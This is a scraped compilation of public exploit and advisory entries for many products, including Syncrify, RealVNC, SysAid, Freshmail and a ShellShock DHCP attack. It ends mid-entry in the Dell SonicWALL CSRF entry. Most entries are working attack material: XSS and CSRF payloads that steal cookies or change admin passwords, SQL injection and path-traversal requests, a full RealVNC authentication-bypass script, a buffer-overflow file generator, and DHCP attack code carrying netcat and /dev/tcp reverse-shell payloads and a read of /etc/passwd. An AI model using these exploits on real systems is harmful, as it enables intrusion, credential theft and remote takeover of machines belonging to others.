Wikidforum 2.10 is vulnerable; other versions may also be affected. 

Search-Field -> Advanced Search -> Author -> '"</script><script>alert(document.cookie)</script>
Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> ><iMg src=N onerror=alert(document.cookie)>
HireHackking 
# Exploit Title: Multiple vulnerabilities in Syncrify Server 3.6 Build 833 (CSRF/Stored XSS)
# Date: 07-05-2015
# Exploit Author: Marlow Tannhauser
# Contact: marlowtannhauser@gmail.com
# Vendor Homepage: http://www.synametrics.com
# Software Link: http://web.synametrics.com/SyncrifyDownload.htm
# Version: 3.6 Build 833. Earlier versions may also be affected.
# CVE: 2015-3140
# Category: Web apps


# DISCLOSURE TIMELINE #
08/02/2015: Initial disclosure to vendor and CERT
09/02/2015: Acknowledgment of vulnerabilities from vendor
11/02/2015: Disclosure deadline of 01/03/2015 agreed with vendor
19/02/2015: Disclosure deadline renegotiated to 01/04/2015 at vendor's request
09/04/2015: Disclosure deadline renegotiated to 20/04/2015 at vendor's request
20/04/2015: Confirmation of fix from vendor
07/05/2015: Disclosure

Note that the CVE-ID is for the CSRF vulnerability only. No CVE-ID has been generated for the stored XSS vulnerabilities. The vulnerable version of the product is no longer available for download from the vendor's webpage.


# EXPLOIT DESCRIPTION #
Syncrify 3.6 Build 833 is vulnerable to CSRF attacks, which can also be combined with stored XSS attacks (authenticated administrators only). The JSESSIONID created when a user logs on to the system is persistent and does not change across requests.


# POC 1 #
The following PoC uses the CSRF vulnerability to change the SMTP settings in the application, and combines it with two of the stored XSS vulnerabilities.

<html>
<img src="http://192.168.0.8:5800/app?adminEmail=%3Cscript%3Ealert%28VICTIM%29%3C%2Fscript%3E&smtpServer=127.0.0.1&smtpPort=25&smtpUser=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&smtpPassword=admin&smtpSecurity=None&proceedButton=Save&operation=config&st=saveSmtp" alt="" width="1" height="1">
</html>


# POC 2 #
The following PoC uses the CSRF vulnerability to change the administrator password.

<html>
<img src="http://192.168.0.8:5800/app?adminPassword=MARLOW&alertInvalidPassword=true&blockIP=false&alertManualPath=false&proceedButton=Save&operation=config&st=saveSecurity" width="0" height="0" border="0">
</html>


# STORED XSS VULNERABILITIES #
Stored XSS vulnerabilities are present in the following fields:

Manage Users > Add New User > User's Full Name [displayed in Reports > Backup report by user]
Example URL: http://192.168.0.8:5800/app?fullName=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&login=user%40user.com&password=password&numVersionsToKeep=0&diskQuota=-1&selectedPath=%2Fhome%2F&operation=manageUsers&st=addUser#

Configuration > Email Configuration > Administrator's Email [displayed in Troubleshoot and Reports pages]
Example URL: http://192.168.0.8:5800/app?adminEmail=%3Cscript%3Ealert%28VICTIM%29%3C%2Fscript%3E&smtpServer=127.0.0.1&smtpPort=25&smtpUser=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&smtpPassword=admin&smtpSecurity=None&proceedButton=Save&operation=config&st=saveSmtp


# MITIGATION #
Upgrade to the latest build of Syncrify Server, available from the link shown.
HireHackking 
source: https://www.securityfocus.com/bid/52425/info
 
Wikidforum is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
 
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
Wikidforum 2.10 is vulnerable; other versions may also be affected. 

Search-Field -> '"</script><script>alert(document.cookie)</script>
HireHackking 
source: https://www.securityfocus.com/bid/52425/info

Wikidforum is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Wikidforum 2.10 is vulnerable; other versions may also be affected. 


Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> [sql-injection]
Search-Field -> Advanced Search -> POST-Parameter 'opt_search_select' -> [sql-injection]
HireHackking 
source: https://www.securityfocus.com/bid/52424/info

TP-LINK TL-WR740N is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or script code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.

TP-LINK TL-WR740N 111130 is vulnerable; other versions may also be affected. 

1. Go to http://www.example.com/maintenance/tools_test.htm
2. make ping like &lt;/textarea&gt;<script>prompt(2)</script>
HireHackking 
Document Title:
===============
Album Streamer v2.0 iOS - Directory Traversal Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1481


Release Date:
=============
2015-05-07


Vulnerability Laboratory ID (VL-ID):
====================================
1481


Common Vulnerability Scoring System:
====================================
6.6


Product & Service Introduction:
===============================
1 Tap - Quick, Album Streamer, best Photo/Video Transfer app ever! Quick way to share your Album Photos and 
Videos to your computer. It takes only single tap to stream and download all/selected photos or videos. 
You can even view or play slide show of all your photos directly on the computer without downloading.

(Copy of the Homepage: https://itunes.apple.com/DE/app/id835284235 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a directory traversal web vulnerability in the official Album Streamer v2.0 iOS mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2015-05-07:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Spider Talk
Product: Album Streamer - iOS Mobile Web Application (Wifi) 2.0


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A Path Traveral web vulnerability has been discovered in the official Album Streamer v2.0 iOS mobile web-application.
The security vulnerability allows a remote attacker to unauthorized request system path variables to compromise the 
mobile application or apple iOS device.

The vulnerability is located in the `id` request to the `path` value of the photoDownload module. The vulnerability can be exploited by 
local or remote attackers without user interaction. The attacker needs to replace the picture assets id path request of the photoDownload 
module with a malicious payload like ./etc/passwd ./etc/hosts. The attack vector is located on the application-side of the service and 
the request method to execute is GET (client-side).

The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6. 
Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction. 
Successful exploitation of the vulnerability results in mobile application compromise

Request Method(s):
				[+] GET

Vulnerable Module(s):
				[+] photoDownload

Vulnerable Parameter(s):
				[+] id

Affected Module(s):
				[+] photoDownload Item Index


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: http://localhost/photoDownload?id=[DIRECTORY TRAVERSAL]../../../../../../../etc


Vulnerable Source(s): localhost/photoDownload
<div class="thumbnailBorder"><div class="thumbnailPicture"><img class="showPreviewModalPopup" src="/photoTbDownload?id=id0" border="0" height="100px" width="100px"></div><div id="thumbnailTitle"><input id="id0" name="photoCheckbox" type="checkbox"> <a href="/photoDownload?id=id0">asset.JPG</a></div></div><div class="thumbnailBorder"><div class="thumbnailPicture"><img class="showPreviewModalPopup" src="/photoTbDownload?id=id1" border="0" height="100px" width="100px"></div><div id="thumbnailTitle"><input id="id1" name="photoCheckbox" type="checkbox"> <a href="/photoDownload?id=id1">asset.PNG</a></div></div>

        <!-- PREVIEW SECTION -->
        <div style="display: none;" id="overlay"></div>
        
        <div style="display: none;" id="popupBox">
            <div style="display: none;" id="popupContent">
                <img class="previewLoadingImage" id="previewLoading" src="/loading.gif">
                
                <img class="previewImage" src="/photoDownload?id=id1">
                
                <img src="/imgAlbumStreamPrev.png" class="btnShowPrev" height="25px" width="25px">
                
                <img src="/imgAlbumStreamNext.png" class="btnShowNext" height="25px" width="25px">
                
            </div>
        </div>

        <!-- BREAK -->
        <div class="sectionBreak"> </div>

        <!-- VIDEOS SECTION -->
        <div>
            <h1>
                <input class="videoAllCheckBox" id="videoAllCheckBox" type="checkbox"> Videos 
                <input class="btnVideoDownload" value="Download (Selected)" type="button"> 
            </h1>
        </div>

--- Poc Session Logs [GET] ---
Status: 200[OK]
GET http://localhost/photoDownload?id=../../../../etc Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[25568] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Connection[keep-alive]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[25568]
      Content-Disposition[: attachment; filename=asset.JPG]
      Date[Thu, 30 Apr 2015 13:29:14 GMT]



Reference(s):
http://localhost/
http://localhost/photoDownload


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the id value in the photoDownload module.
Restrict the input and disallow special chars to prevent further path traversal attacks.
implement a whitelist to request only authroized urls through the mobile app api.


Security Risk:
==============
The security risk of the directory traversal vulnerability in the wifi interface is estimated as high. (CVSS 6.6)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking 
source: https://www.securityfocus.com/bid/52416/info

Synology Photo Station is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Photo Station 5 DSM 3.2 (1955) is vulnerable; other versions may also be affected. 

http://www.example.com/photo/photo_one.php?name=494d475f32303131303730395f3232343432362e6a7067&dir=6970686f6e65207068696c69707065&name=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%38%38%2c%38%33%2c%38%33%29%29%3c%2f%73%63%72%69%70%74%3e

http://www.example.com/photo/photo_one.php?name=494d475f32303131303730395f3232343432362e6a7067&dir=6970686f6e65207068696c69707065&name=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3c%2f%73%63%72%69%70%74%3e%3c%61%20%68%72%65%66%3d%22
HireHackking 
# Exploit Title: RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit
# Date: 2012-05-13
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 4.1.0 and 4.1.1
# Tested on: Windows XP
# CVE: CVE-2006-2369 
# Requires vncviewer installed
# Basic port of hdmoore/msf2 perl version to python for fun and profit (ease of use)
import select
import thread
import os
import socket
import sys, re

BIND_ADDR = '127.0.0.1'
BIND_PORT = 4444

def pwn4ge(host, port):
	socket.setdefaulttimeout(5)
	server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	try:
		server.connect((host, port))
	except socket.error, msg:
		print '[*] Could not connect to the target VNC service. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1] 
		sys.exit();
	else:
		hello = server.recv(12)
		print "[*] Hello From Server: " + hello
		if hello != "RFB 003.008\n":
			print "[*] The remote VNC service is not vulnerable"
			sys.exit()
		else:
			print "[*] The remote VNC service is vulnerable"
			listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
			try:
				listener.bind((BIND_ADDR, BIND_PORT))
			except socket.error , msg:
				print '[*] Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
				sys.exit()
			print "[*] Listener Socket Bind Complete"
			listener.listen(10)
			print "[*] Launching local vncviewer"
			thread.start_new_thread(os.system,('vncviewer ' + BIND_ADDR + '::' + str(BIND_PORT),))
			print "[*] Listener waiting for VNC connections on localhost"
			client, caddr = listener.accept()
			listener.close()
			client.send(hello)
			chello = client.recv(12)
			server.send(chello)
			methods = server.recv(2)
			print "[*] Auth Methods Recieved. Sending Null Authentication Option to Client"
			client.send("\x01\x01")
			client.recv(1)
			server.send("\x01")
			server.recv(4)
			client.send("\x00\x00\x00\x00")
			print "[*] Proxying data between the connections..."
			running = True
			while running:
				selected = select.select([client, server], [], [])[0]
				if client in selected:
					buf = client.recv(8192)
					if len(buf) == 0:
						running = False
					server.send(buf)
				if server in selected and running:
					buf = server.recv(8192)
					if len(buf) == 0:
						running = False
					client.send(buf)
				pass
			client.close()
		server.close()
	sys.exit()

def printUsage():
	print "[*] Read the source, Luke!"

def main():
	try:
		SERV_ADDR = sys.argv[1]
		SERV_PORT = sys.argv[2]
	except:
		SERV_ADDR = raw_input("[*] Please input an IP address to pwn: ")
		SERV_PORT = 5900
	try:
		socket.inet_aton(SERV_ADDR)
	except socket.error:
		printUsage()
	else:
		pwn4ge(SERV_ADDR, int(SERV_PORT))

if __name__ == "__main__":
	main()
HireHackking 
source: https://www.securityfocus.com/bid/52350/info

ToendaCMS is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.

The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

ToendaCMS 1.6.2 is vulnerable; other versions may also be affected. 

http://www.example.com/setup/index.php?site=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/s
HireHackking 
source: https://www.securityfocus.com/bid/52356/info

Ilient SysAid is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker could leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.

Ilient SysAid 8.5.05 is vulnerable; other versions may also be affected. 

HTML injection:
<tablewidth="100%"cellspacing="5"cellpadding="5"border="0"class="Maxed">
<tbody><trvalign="top"><tdwidth="50%"style="padding:10px;"id="Container_1"><tableclass="MaxedContainerContainer_1">
<tbody><tr>
<tdclass="Container_Header">
<table>
<tbody><tr>
<tdclass="Container_Header_First">
<tdclass="Container_Header_Center">
Administratorsonline
</td><tdclass="Container_Header_Last">
</td>

</tr>
</tbody></table></td>
</tr>
<tr>
<tdclass="Container_Body">
<divclass="BorderFix_FFForm_Ctrl_Label">
<br/>
1Users<br/>
JulienAhrens<EXCUTES PERSISTENT SCRIPt CODE HERE!></div></td></tr></tbody></table></td></tr></tbody>
</table></div></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></body></html>



Cross-site scripting:

http://www.example.com:8080/sysaid/CustomizeListView.jsp?listName=Assets&listViewName=<script>alert(document.cookie)</script>

or base64 encoded:
http://www.example.com:8080/sysaid/CustomizeListView.jsp?listName=Service%20Requests&srType=1&listViewName= () 
BASE64@PHNjcmlwdD5hb
GVydChlc2NhcGUoZG9jdW1lbnQuY29va2llKSk8L3NjcmlwdD4=



Non-persistent(listViewName):

<tdcolspan="6"class="Frame_Body_Center">
<tablewidth="100%"border="0"class="Maxed">

<tbody><trvalign="top">
<tdstyle="padding:10px;"id="Conainer_1">
<tablewidth=""cellspacing="0"cellpadding="0"border="0">
<tbody><tr>
<td>
<tablewidth="100%"cellspacing="0"cellpadding="0"border="0"class="MaxedContainerContainer_1">

<tbody><tr>
<tdclass="Container_Header">

<table>
<tbody><tr>
<tdclass="Container_Header_First"/>
<tdclass="Container_Header_Center">
<palign="center"style="font-size:16px;">Customizelist-Assets-<EXCUTES PERSISTENT SCRIPt CODE HERE> 

</p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr>
</tbody></table></td></tr></tbody></table></form></body></html>
HireHackking 
source: https://www.securityfocus.com/bid/52351/info

Macro Toolworks is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

Local attackers can exploit this issue to run arbitrary code with elevated privileges. Failed exploit attempts can result in a denial-of-service condition.

Macro Toolworks 7.5.0 is vulnerable; other versions may also be affected. 

#!/usr/bin/python
 
# Exploit Title: Pitrinec Software Macro Toolworks Free/Standard/Pro v7.5.0 Local Buffer Overflow
# Version:       7.5.0
# Date:          2012-03-04
# Author:        Julien Ahrens
# Homepage:      http://www.inshell.net
# Software Link: http://www.macrotoolworks.com
# Tested on:     Windows XP SP3 Professional German / Windows 7 SP1 Home Premium German
# Notes:         Overflow occurs in _prog.exe, vulnerable are all Pitrinec applications on the same way.
# Howto:         Copy options.ini to App-Dir --> Launch

# 646D36: The instruction at 0x646D36 referenced memory at 0x42424242. The memory could not be read -> 42424242 
(exc.code c0000005, tid 3128)

# Registers:
# EAX 0120EA00 Stack[000004C8]:0120EA00
# EBX FFFFFFFF 
# ECX 42424242 
# EDX 00000002 
# ESI 007F6348 _prog.exe:007F6348
# EDI 007F6348 _prog.exe:007F6348
# EBP 0120EA0C Stack[000004C8]:0120EA0C
# ESP 0120E9E8 Stack[000004C8]:0120E9E8
# EIP 00646D36 _prog.exe:00646D36
# EFL 00200206

# Stack:
# 0120E9E0  0012DF3C
# 0120E9E4  00000000
# 0120E9E8  0205A5A0  debug045:0205A5A0
# 0120E9EC  1B879EF8
# 0120E9F0  007F6348  _prog.exe:007F6348
# 0120E9F4  007F6348  _prog.exe:007F6348

# Crash:
# _prog.exe:00646D36 ; ---------------------------------------------------------------------------
# _prog.exe:00646D36 mov     eax, [ecx]
# _prog.exe:00646D38 call    dword ptr [eax+0Ch]
# _prog.exe:00646D3B call    near ptr unk_6750D0
# _prog.exe:00646D40 retn    4
# _prog.exe:00646D40 ; ---------------------------------------------------------------------------

# Dump:
# 007F6380  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
# 007F6390  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
# 007F63A0  42 42 42 42 43 43 43 43  43 43 43 43 43 43 43 43  BBBBCCCCCCCCCCCC
# 007F63B0  43 43 43 43 43 43 43 43  43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
# 007F63C0  43 43 43 43 43 43 43 43  43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC

file="options.ini"

junk1="\x41" * 744
boom="\x42\x42\x42\x42"
junk2="\x43" * 100

poc="[last]\n"
poc=poc + "file=" + junk1 + boom + junk2 

try:
    print "[*] Creating exploit file...\n"
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!"
except:
    print "[!] Error while creating file!"
HireHackking 
source: https://www.securityfocus.com/bid/52358/info

Barracuda CudaTel Communication Server is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.

Barracuda CudaTel Communication Server 2.0.029.1 is vulnerable; other versions may also be affected. 

<td class="detailTD">
<div style="float: left;" class="printedName">
"><iframe div="" <="" onload='alert("VL")' src="a">
</td><script type="text/javascript">extensions_register('extOp530748', 'extOp530748-ext144', 
{"flag_super":"0","flag_locked":
"0","bbx_extension_rcd":"2012-02-16 
11:21:48.105901","bbx_extension_block_begin":"2088","map"{"bbx_conference_id":null,"bbx_provider_gateway_id":null,"sort_name":
"\"><iframe src=a onload=alert(\"vl\") 
<","bbx_valet_parking_id":null,"bbx_extension_entity_map_id":"82","bbx_extension_entity_
map_fallback_exten":null,"bbx_
extension_entity_map_metadata":null,"bbx_user_id":null,"bbx_router_id":"20","bbx_group_id":null,"bbx_callflow_id":null,"_force_
row_refresh":"0","show_name":"\"><[EXECUTION OF PERSISTENT SCRIPT CODE]
<","bbx_queue_id":null,"bbx_tdm_card_port_id":null,"flag_standalone":"1","bbx_auto_attendant_id":null,"bbx_extension_id_
forward":null},"bbx_extension_name":null,"bbx_domain_id":"6","bbx_extension_block_end":"2088","type_id":

{"id":"20","type":"router","col":"bbx_router_id"},"map_id":"82","flag_external":"0","flag_voicemail":"0","bbx_extension_value"
:"2088","ldap":0,"bbx_extension_rpd":"2012-02-16 11:21:49.06783","user_synced":null,"printed_name":"\"><[EXECUTION OF 
PERSISTENT SCRIPT CODE]
<","bbx_extension_id":"144","group_synced":null,"type":"router","flag_auto_provision":"0"});</script>
HireHackking 
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/>
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps

1. Summary
------------------

Freshmail plugin is an email marketing plugin for wordpress, allowing the
administrator to create mail campaigns and keep track of them.

There is a unauthenticated SQL injection vulnerability in the "Subscribe to
our newsletter" formularies showed to the web visitors in the POST
parameter *fm_form_id. *

2. Vulnerability timeline
----------------------------------

- 04/05/2015: Identified in version 1.5.8 and contact the developer company
by twitter.
- 05/05/2015: Send the details by mail to developer.

- 05/05/2015: Response from the developer.
        - 06/05/2015: Fixed version in 1.6

3. Vulnerable code
---------------------------

Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50

[...]
Line 28:  add_action('wp_ajax_fm_form', 'fm_form_ajax_func');
Line 29:  add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func');
[...]
Line 44: $result = $_POST;
[...]
Line 50: $form = $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms
where form_id="'.*$result['fm_form_id']*.'";');
[...]

3. Proof of concept
---------------------------

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <web>
X-Requested-With: XMLHttpRequest
[...]
Cookie: wordpress_f30[...]

form%5Bemail%5D=fake@fake.com&form%5Bimie%5D=asdf&fm_form_id=1" and
"a"="a&action=fm_form&fm_form_referer=%2F

4. Explanation
---------------------

A page visitor can submit an email (fake@fake.com) to subscribe to the
formulary with fm_form_id="1" and the JSON message received will be simil=
ar
to:

{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"s=
uccess","message":"*Your
sign up request was successful! Please check your email inbox.*"}

The second time he tries to do the same with the same email the message
returned will be:

{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"s=
uccess","message":"*Given
email address is already subscribed, thank you!*"}

If we insert *1**" and substr(user(),1,1)="a *we'll receive either the sa=
me
message  indicating that the Given email is already subscribed indicating
that the first character of the username is an "a" or a null message
indicating that the username first character is not an "a".

5. Solution
---------------

Update to version 1.6
HireHackking 
source: https://www.securityfocus.com/bid/52361/info

SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

SAP Business Objects XI R2 is vulnerable; other versions may be affected. 

http://www.example.com/businessobjects/enterprise115/InfoView/listing.aspx
searchText=</script><script>alert(1);</script>
HireHackking 
#!/usr/bin/python
# Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC
# Date: 2014-09-29 
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 4.1
# Tested on: Debian, Ubuntu, Kali
# CVE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
from scapy.all import *

conf.checkIPaddr = False
fam,hw = get_if_raw_hwaddr(conf.iface)
victim_assign_ip = "10.0.1.100"
server_ip = "10.0.1.2"
gateway_ip = "10.0.1.2"
subnet_mask = "255.255.255.0"
dns_ip = "8.8.8.8"
spoofed_mac = "00:50:56:c0:00:01"
payload =   "() { ignored;}; echo 'moo'"
payload_2 = "() { ignored;}; /bin/nc -e /bin/bash localhost 7777"
payload_3 = "() { ignored;}; /bin/bash -i >& /dev/tcp/10.0.1.1/4444 0>&1 &"
payload_4 = "() { ignored;}; /bin/cat /etc/passwd"
payload_5 = "() { ignored;}; /usr/bin/wget http://google.com"
rce = payload_5
 
def toMAC(strMac):
    cmList = strMac.split(":")
    hCMList = []
    for iter1 in cmList:
        hCMList.append(int(iter1, 16))
    hMAC = struct.pack('!B', hCMList[0]) + struct.pack('!B', hCMList[1]) + struct.pack('!B', hCMList[2]) + struct.pack('!B', hCMList[3]) + struct.pack('!B', hCMList[4]) + struct.pack('!B', hCMList[5])
    return hMAC
 
def detect_dhcp(pkt):
#       print 'Process ', ls(pkt)
        if DHCP in pkt:
                # if DHCP Discover then DHCP Offer
                if pkt[DHCP].options[0][1]==1:
                        clientMAC = pkt[Ether].src
                        print "DHCP Discover packet detected from " + clientMAC
 
                        sendp(
                                Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
                                IP(src=server_ip,dst="255.255.255.255")/
                                UDP(sport=67,dport=68)/
                                BOOTP(
                                        op=2,
                                        yiaddr=victim_assign_ip,
                                        siaddr=server_ip,
                                        giaddr=gateway_ip,
                                        chaddr=toMAC(clientMAC),
                                        xid=pkt[BOOTP].xid,
                                        sname=server_ip
                                )/
                                DHCP(options=[('message-type','offer')])/
                                DHCP(options=[('subnet_mask',subnet_mask)])/
                                DHCP(options=[('name_server',dns_ip)])/
                                DHCP(options=[('lease_time',43200)])/
                                DHCP(options=[('router',gateway_ip)])/
                                DHCP(options=[('dump_path',rce)])/
                                DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1"
                        )
                        print "DHCP Offer packet sent"
 
                # if DHCP Request than DHCP ACK
                if pkt[DHCP] and pkt[DHCP].options[0][1] == 3:
                        clientMAC = pkt[Ether].src
                        print "DHCP Request packet detected from " + clientMAC
 
                        sendp(
                                Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
                                IP(src=server_ip,dst="255.255.255.255")/
                                UDP(sport=67,dport=68)/
                                BOOTP(
                                        op=2,
                                        yiaddr=victim_assign_ip,
                                        siaddr=server_ip,
                                        giaddr=gateway_ip,
                                        chaddr=toMAC(clientMAC),
                                        xid=pkt[BOOTP].xid
                                )/
                                DHCP(options=[('message-type','ack')])/
                                DHCP(options=[('subnet_mask',subnet_mask)])/
                                DHCP(options=[('lease_time',43200)])/
                                DHCP(options=[('router',gateway_ip)])/
                                DHCP(options=[('name_server',dns_ip)])/
                                DHCP(options=[('dump_path',rce)])/
                                DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1"
                        )
                        print "DHCP Ack packet sent"
 
def main():
        #sniff DHCP requests
        sniff(filter="udp and (port 67 or 68)", prn=detect_dhcp, iface="vmnet1")
 
if __name__ == '__main__':
        sys.exit(main())
HireHackking 
# Exploit Title: Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery
# Date: 04/28/2015
# Exploit Author: Veit Hailperin
# Vendor Homepage: www.dell.com
# Version: Dell SonicWALL SRA 7.5 prior to 7.5.1.0-38sv and 8.0 prior to 8.0.0.1-16sv
# CVE : 2015-2248

Exploitation Procedure (Outline):
  1. Use CSRF to force currently logged in user to create a bookmark pointing to an endpoint controlled by the attacker.
  2. Use subsequent request to call the bookmark just created. The identifier of the bookmark can be bruteforced using a single decrementing integer and causes minimal time delay.
  3. Gather the credentials on the target server provided in step #1 
  
1. Create a bookmark:

<html>
  <body>
    <form action="https://vulnerable.vpn-installation.tld/cgi-bin/editBookmark" method="POST">
      <input type="hidden" name="bmName" value="foo" />
